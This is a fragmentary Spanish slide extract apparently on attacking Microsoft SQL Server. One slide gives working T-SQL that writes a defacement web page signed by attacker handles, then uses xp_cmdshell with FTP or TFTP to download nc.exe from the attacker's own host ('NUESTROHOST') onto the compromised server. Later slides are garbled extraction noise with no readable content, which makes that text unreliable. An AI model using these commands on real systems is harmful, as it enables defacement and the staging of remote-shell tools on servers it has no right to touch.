  • 39. 2C exec @ret=sp_oamethod @f, 'writeline', NULL, '<DIV align=center> <CENTER> <TABLE cellSpacing=0 cellPadding=0 width=100 border=0>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<TBODY> <TR> <TD bgColor=#d20000>&nbsp;</TD></TR> <TR> <TD align=middle bgColor=#ffff00>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<FONT color=#ffff00 size=1>¡ORTO!<BR>¡¡¡Va por vosotros!!! </FONT></TD></TR> <TR> <TD ' exec @ret=sp_oamethod @f, 'writeline', NULL, 'bgColor=#d20000>&nbsp ;</TD></TR><!--" "-- ></TBODY></TABLE></CENTER></DIV> ' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P><BR><BR><BR><BR><BR></P>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P align=right> <FONT face="Courier New" color=#00ff00 size=5> lagear & runlevel</FONT></P>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P align=right> <FONT face="Courier New" color=#00ff00 size=4>Recuerdos a <B>N</B>9<B>Team</B></FONT>' exec @ret=sp_oamethod @f, 'writeline', NULL, '</P> <P align=right> <FONT face="Courier New" color=#00ff00 size=3>' exec @ret=sp_oamethod @f, 'writeline', NULL, 'Donde te podemos encontrar BreakICE?</FONT></P> <FONT color=black>" </FONT> </BODY></HTML>' Para subir archivos.- Creamos un archivo get.txt para utilizar luego ftp declare @o int, @f int, @t int, @ret int EXECUTE sp_oacreate 'scripting.filesystemobject', @o out EXECUTE sp_oamethod @o, 'createtextfile', @f out, 'c:get.txt', 1 EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'user anonymous' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'get nc.exe' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'quit' EXECUTE master.xp_cmdshell 'FTP -s c:get.txt NUESTROHOST' o algo mas fácil si tenemos un tftp en nuestro host EXECUTE master.xp_cmdshell 'TFTP -i NUESTROHOST GET c:mi_local_file c:remote_file'
  • 40. 3 ----- Extracto ------------------------------------------ :M& ) & ) " " ( " * " " )4 " . " " " 6 " " #0#$% # 6 & 6 " *=" " 9 " ) " . " " " 8 " " & " " Q + " Q 9 " " . " )4 :%8 " " * #$% # 6 E " 4 " . * "+" )4 F + " 7 " " " . )4 6 " ) " ; " Q . & c " & )4 M : ;! ; ` & < a ; " Q )4 M & ` & 6 : ;! ; a ` & ` V a ` : ;! ; a ` a a " 3 , + # ) " " " & 9 #0#$% " ) " " 9 " 7" " " "& ) 9 " . " " & " * " & 9 ) 4 .J 6 " " J " " ) " 7 " #$% 4 ! " 9 " D " + #$% 9 6 " ) " " " ) < " 6 & + = " ) " " " " ( " E: ) = " "IF & " + * " " " ) * " 6 " . & " " #$% + " 5 ) " * . >; : G ) 5 # + ! 4 > " " 7 . " " ) " " #$% 4 + " ) " " " " " 0 * # L 1;: : ;A %8L ' > > % + = " " + ) = " " J " " "
  •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
  • 42. 3 ! " " " . " . * . E, " 6 " ) " " " " . ( & M" ) * . F H * 9 6 " " " " " #0#$% # 6 8" ) ( " 6 . " "& " ) " " 9 ( " " " " 8" ) ( 6 " " . 6 " * " * E " " " . ) 0 " " " * ( " M " " MF 8" ) ( "" * #5 # " 9 " . & " " " * " . " 6 #0#$% 6 ' 1 4 ) ) " " 6 " " " " " " . " ( " . " H 6 ) " " ) " " ' 9 " " " " " " " " " >$ > " " " 9 " " . ) " " "A % B ! #0#$% # 6 " " & + " " ) " 7 " + 6 " " 6 " . " . " " " * " " " " . & 9 9 " ) " " " " " ) + + " ( " . 6 ( " " " " ) 4 " " " " " 6 " " " . ' " * & " " 9 . " 6 " " " 6 & < " " ) " " " " . + " " " " 9 + = " " " 6 " ) " & " ) < 7< " + " " 7 " M . " ) #0#$% # 6 8 " " " . "& " " + "* ( " " A " "& " " + # 6 " ! M" = & * . " " " 6 " ) " "& " . * " * 6 " " . G " & " ) " " 6 " " "& " " " " ) > .= " ) " . " . > + " " " " ) " " . & ) = 6 " #$% 4 . *= 4 # ) * " " & 74 " 6 " " * M . * " G " 8 " & " " " * "& " " " " " + " " " . * ) = " . " " " " 6 ) " 6 " E; " " #0#$%F 8" ) " " " " 9 " . " D " " . * ) " . ( # #;8 5 G "
  •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
  •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d " " " J "KF ! & . " " 9 " . " " " " " " " . * & < " 9 D 5 " >5 . ! >